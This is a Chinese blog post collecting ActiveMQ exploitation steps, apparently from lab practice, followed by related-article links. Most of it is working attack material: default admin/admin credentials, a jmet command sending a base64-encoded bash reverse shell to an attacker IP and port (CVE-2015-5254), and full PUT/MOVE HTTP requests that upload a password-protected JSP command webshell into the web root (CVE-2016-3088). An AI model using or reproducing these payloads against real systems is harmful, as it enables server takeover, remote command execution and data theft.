activemq漏洞合集

最新推荐文章于 2024-05-14 15:29:25 发布
最新推荐文章于 2024-05-14 15:29:25 发布
阅读量528 收藏
点赞数 1
文章标签: activemq 网络 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46626737/article/details/131500337
版权

1.active mq未授权访问
        http://ip:port/admin/connections.jsp
        弱口令:admin/admin/
    2.activemq反序列化(CVE-2015-5254)
        操作技巧:
            先将反弹shell命令进行序列化和base64加密:
            L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMjEyLzIyMzMgMD4mMQ==
            再使用jmet包:
            java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c 
            {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMjEyLzIyMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 目标地址 61616
        漏洞原理:
        漏洞版本:ActiveMQ < 5.13.0 之前 5.x 版本
    3.activemq任意文件写入(CVE-2016-3088)
        操作技巧:
            先登录后台,然后抓包,使用PUT方法,上传一个shell
            PUT /fileserver/shell.jsp HTTP/1.1
            Host: 192.168.110.129:8161
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            Accept-Encoding: gzip, deflate
            Authorization: Basic YWRtaW46YWRtaW4=
            Connection: close
            Cookie: JSESSIONID=1nyt11keu8djf1atn2l3dyc3a7
            Upgrade-Insecure-Requests: 1
            Content-Length: 344

            <%
                if("luckysec".equals(request.getParameter("pwd"))){
                    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
                    int a = -1;
                    byte[] b = new byte[2048];
                    out.print("<pre>");
                    while((a=in.read(b))!=-1){
                        out.println(new String(b));
                    }
                    out.print("</pre>");
                }
            %>
            上传显示204,成功,但是该路径下没有解析权限,所以需要使用MOVE方法进行移动到正常的物理路径
            http://192.168.110.129:8161/admin/test/systemProperties.jsp查看物理路径
            再使用move更改文件路径:
            MOVE /fileserver/shell.jsp HTTP/1.1
            Destination: file:///opt/activemq/webapps/api/shell.jsp
            Host: 192.168.110.129:8161
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            Accept-Encoding: gzip, deflate
            Authorization: Basic YWRtaW46YWRtaW4=
            Connection: close
            Cookie: JSESSIONID=1nyt11keu8djf1atn2l3dyc3a7
            Upgrade-Insecure-Requests: 1
            访问连接即可,pwd=luckysec&cmd=ls
        漏洞原理:
        漏洞版本:Apache ActiveMQ 5.x ~ 5.14.0

!QK
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ActiveMQ反序列化漏洞(CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ反序列化漏洞(CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
activemq未授权访问漏洞环境
01-11
网络攻防
ActiveMQ漏洞总结
qq_42176207的博客
05-08 7538
ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。 Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 Ac
activemq原理_ActiveMQ漏洞总结
weixin_39693193的博客
11-27 438
目录ActiveMQ攻击方式寻找目标弱口令未授权访问源代码泄露XSS漏洞远程代码执行漏洞反序列化漏洞ActiveMQApache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。...
ActiveMQ任意文件写入漏洞
weixin_47493074的博客
09-23 396
ActiveMQ任意文件写入漏洞
activemq系列漏洞复现
m0_49420271的博客
06-07 2715
vulhub中activemq系列漏洞复现
ActiveMQ反序列化漏洞原理+复现
ChenD的学习笔记
03-09 2032
ActiveMQ通过消息队列来实现信息传递,每个消息要保证发出端和接收端格式相同,其中使用了序列化的方法进行传递,在这个过程中没有限制可在代理中序列化的类,这时候我们就可以自己构造一份序列化的恶意代码payload,将其作为事件发到ActiveMQ服务上,在管理员在后台管理时触发了payload,或者攻击者使用弱口令拿到ActiveMQ的账户,并执行了payload,则可以成功利用该漏洞。消息队列,服务器A将客户发起的请求放入服务器B的消息队列中,服务器B从消息队列中取出并处理。
[Vulhub] ActiveMQ漏洞
weixin_45605352的博客
01-10 3452
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 0x00 漏洞描述 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.13.0 之前的 5.x 版本安全漏洞,该程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java Message Service (JMS) ObjectMessage 对象,利用该漏洞执行任意代码。
记一次ActiveMQ漏洞利用
未完成的歌~的博客
08-25 769
Apache ActiveMQ 是 Apache 软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务、集群、Spring Framework 等。随着中间件的启动,会打开两个端口,61616 是工作端口,消息在这个端口进行传递;8161 是 Web 管理控制台。
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
weixin_44047654的博客
11-25 2617
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
ActiveMQ 反序列化漏洞(CVE-2015-5254)利用工具
08-15
ActiveMQ 反序列化漏洞(CVE-2015-5254)利用工具,ActiveMQ漏洞,反序列化漏洞,CVE-2015-5254,利用工具,工具
一个jms activemq Topic 消息实例
07-30
一个jms activemq Topic 消息实例 关于jms JMS 是接口,相当于jdbc ,要真正使用它需要某些厂商进行实现 ,即jms provider 常见的jms provider 有 ActiveMQ JBoss 社区所研发的 HornetQ (在jboss6 中默认即可以...
activemq-transport-xstream-1.4.jar.zip
07-18
标签:activemq-transport-xstream-1.4.jar.zip,activemq,transport,xstream,1.4,jar.zip包下载,依赖包
ActiveMQ 反序列化漏洞(CVE-2015-5254)
The code way of kinnisoy
10-24 1952
ActiveMQ 反序列化漏洞(CVE-2015-5254)
[应用安全]之ActiveMQ漏洞利用方法总结
zhang8907xiaoyue的博客
03-22 7130
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。ActiveMQ 是一个完全支持JMS1.1和J2EE 1.4规范的 JMS Provider实现,尽管JMS 应用介绍 Apache ActiveMQ是Apache软件基金会所研发的开放源代码
漏洞分析|Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)
xuandaoren的博客
10-31 3393
Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。类, 然后重写对应的逻辑,这样在运⾏的时候, 因为。查找顺序的问题, 程序就会优先使⽤当前源码⽬录⾥的。获取到了对应的序列化器之后, 会调⽤它的。⾥⾯获取对应的序列化器。
【 Vluhub 靶场——ActiveMQ漏洞利用】
jieli0901227的博客
12-26 968
ActiveMQ 漏洞
Apache ActiveMQ 远程代码执行漏洞复现(CNVD-2023-69477)
huangyongkang666的博客
10-31 4436
上周爆出来的activeMQ远程代码执行漏洞,正好做一下漏洞复现,记录一下。
【Linux】Centos9设置ActiveMq开机自启功能
最新发布
Chuk
05-14 600
检查 SELinux 配置:检查 SELinux 的配置是否会影响到 ActiveMQ 的执行。你可以通过运行 sestatus 命令来查看 SELinux 的状态,以及通过 /etc/selinux/config 文件来查看 SELinux 的配置。确保你检查了系统中是否还有其他安全性机制,并且了解它们是否会影响到 ActiveMQ 的执行。临时禁用 SELinux:尝试临时禁用 SELinux,然后重新启动 ActiveMQ,看看问题是否仍然存在。
ActiveMQ 漏洞
10-12
关于 ActiveMQ 漏洞,我可以告诉你一些基本信息。ActiveMQ 是一种流行的开源消息代理,但是它也存在一些漏洞,例如: 1. CVE-2015-5254:ActiveMQ 可能允许未经身份验证的攻击者执行任意代码。 2. CVE-2016-3088:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值